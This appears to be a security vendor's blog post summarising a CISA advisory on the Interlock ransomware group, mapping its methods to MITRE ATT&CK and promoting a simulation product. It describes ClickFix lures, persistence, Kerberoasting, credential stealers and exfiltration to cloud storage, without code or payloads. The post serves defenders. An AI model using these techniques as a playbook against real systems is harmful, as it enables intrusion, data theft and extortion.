Interlock Ransomware Analysis, Simulation, and Mitigation - CISA Alert AA25-203A

On July 22, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Interlock ransomware [1]. Interlock ransomware has been actively targeting critical infrastructure across North America and Europe since late 2024. Their attacks are opportunistic but highly disruptive impacting virtual machines across Windows and Linus operating systems.

In this blog post, we explain the Tactics, Techniques, and Procedures (TTPs) used by Interlock ransomware and how organizations can defend themselves against Interlock ransomware attacks.

Simulate Ransomware Threats with 14-Day Free Trial of Picus Platform

Interlock Ransomware Group

Interlock is a financially motivated ransomware group first observed in September 2024. Interlock operators employ a double extortion strategy encrypting victim data and threatening to leak stolen information if ransom demands are not met.

The group has primarily targeted organizations in North America and Europe, affecting sectors ranging from business services to critical infrastructure. Victims include a mix of large enterprises and smaller organizations, reflecting an opportunistic targeting strategy.

Interlock follows an unusual ransom process. Instead of providing a ransom amount or payment details in the initial note, victims are given a unique ID and directed to a Tor-based website to initiate negotiations. The group has previously followed through on threats to publish stolen data, showing their willingness to escalate pressure on non-compliant victims.

The group's modus operandi involves compromising networks, exfiltrating sensitive data, and then deploying an encryptor tailored for virtualized environments. Interlock operators gain initial access through less common methods, such as drive-by downloads from compromised websites and a deceptive tactic known as ClickFix, which tricks users into executing malicious PowerShell payloads via fake CAPTCHA or alert prompting. After gaining access, they conduct extensive reconnaissance and deploy remote access tools like Cobalt Strike, AnyDesk, and PuTTY. Credential harvesting is facilitated through custom stealers, Lumma Stealer, and Berserk Stealer, while data exfiltration often involves AzCopy to transfer stolen files to Azure storage blobs. The final payload is typically named conhost.exe. It encrypts data using a combination of AES and RSA algorithms, appends .interlock or .1nt3rlock file extensions, and is deleted post-execution to evade detection.

Interlock Ransomware Analysis and MITRE ATT&CK TTPs

Initial Access

T1189 Drive-by Compromise

Interlock actors gain initial access by delivering malicious payloads through drive-by downloads on compromised legitimate websites. Victims are tricked into downloading disguised files, often presented as fake updates for browsers or security tools like FortiClient and Cisco AnyConnect.

T1204.004 User Execution: Malicious Copy and Paste

Using the ClickFix technique, Interlock operators prompt users to run a fake CAPTCHA, which leads them to open the Windows Run dialog and execute a malicious, Base64-encoded PowerShell script. This method depends on manual user interaction to initiate infection.

Execution

T1059.001 Command and Scripting Interpreter: PowerShell

Interlock actors execute PowerShell scripts to drop remote access trojans and perform system reconnaissance. These scripts also create persistence mechanisms, such as registry key modifications.

Persistence

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Interlock operators establish persistence by placing malicious files in the Windows Startup folder or modifying registry run keys. One observed registry entry is disguised as "Chrome Updater" and triggers on user login.

Privilege Escalation

T1078.002 Valid Accounts: Domain Accounts

After gaining access, Interlock actors escalate privileges by compromising domain administrator accounts, possibly through techniques like Kerberoasting.

Defense Evasion

T1036.005 Masquerading: Match Legitimate Name or Location

Malicious components are disguised with names resembling legitimate Windows files, such as conhost.exe and conhost.txt, to blend in with normal system processes and evade detection.

T1070.004 Indicator Removal: File Deletion

Following encryption, Interlock operators use the remove() function in DLL files (e.g., tmp41.wasd) or equivalent Linux commands to delete the ransomware binary and reduce forensic evidence.

T1218.011 System Binary Proxy Execution: Rundll32

Interlock actors use rundll32.exe to execute DLL payloads indirectly, which helps bypass certain security controls and execute post-encryption cleanup.

Discovery

T1033 System Owner/User Discovery

Interlock operators use PowerShell commands like WindowsIdentity.GetCurrent() to identify the current user and determine their access level.

T1082 System Information Discovery

Commands like systeminfo and Get-PSDrive are used to collect details about the operating system, hardware, and logical drives.

T1007 System Service Discovery

Interlock actors run tasklist /svc and Get-Service to enumerate active services, which can indicate the presence of security tools or monitoring systems.

T1016 System Network Configuration Discovery

The arp -a command is used to inspect the ARP cache, helping attackers map internal network IPs and MAC addresses.

Credential Access

T1555.003 Credentials from Web Browsers

Interlock uses information stealers like Lumma and Berserk to collect login credentials stored in web browsers, enabling further access and lateral movement.

T1056.001 Input Capture: Keylogging

Keyloggers such as klg.dll are deployed to record keystrokes and store them in files like conhost.txt, enabling theft of sensitive user input.

T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting

To escalate privileges, Interlock actors may perform Kerberoasting attacks to obtain Kerberos service tickets associated with high-privilege accounts.

Lateral Movement

T1078 Valid Accounts

Harvested credentials are reused to authenticate across systems within the network, enabling stealthy lateral movement.

T1021.001 Remote Services: Remote Desktop Protocol (RDP)

Interlock operators access other systems over RDP using stolen credentials. Tools like AnyDesk and PuTTY are also used to facilitate remote access and movement.

Collection

T1530 Data from Cloud Storage

Before encryption, Interlock actors use tools like Azure Storage Explorer to browse victims' cloud storage environments and identify valuable data.

Exfiltration

T1567.002 Exfiltration to Cloud Storage

Interlock operators exfiltrate data using AzCopy, which uploads files to Azure blob storage controlled by the attackers.

T1048 Exfiltration Over Alternative Protocol

File transfer tools like WinSCP are also used to move exfiltrated data out of the environment using secure copy or FTP protocols.

Command and Control

T1105 Ingress Tool Transfer

Payloads are downloaded to compromised systems using PowerShell and disguised installers. These include credential stealers and keyloggers.

T1219 Remote Access Software

Interlock operators rely on tools like AnyDesk and PuTTY to maintain persistent remote access across victim environments. Cobalt Strike, SystemBC, and custom RATs like Interlock RAT and NodeSnake RAT are used for C2 communication and post-exploitation control.

Impact

T1486 Data Encrypted for Impact

Interlock ransomware encrypts files using AES and RSA encryption algorithms. Encrypted files are given .interlock or .1nt3rlock extensions, and a ransom note (!__README__!.txt) is delivered via group policy.

How Picus Helps Simulate Interlock Ransomware Attacks?

We also strongly suggest simulating Interlock ransomware attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other ransomware variants, such as Medusa, Rhysida, and Black Basta, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Interlock ransomware: 

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Interlock ransomware and other ransomware attacks in preventive security controls. Currently, Picus Labs has validated the following signatures for Interlock ransomware:

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial of the Picus Security Validation Platform.

References

[1] "#StopRansomware: Interlock Ransomware," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a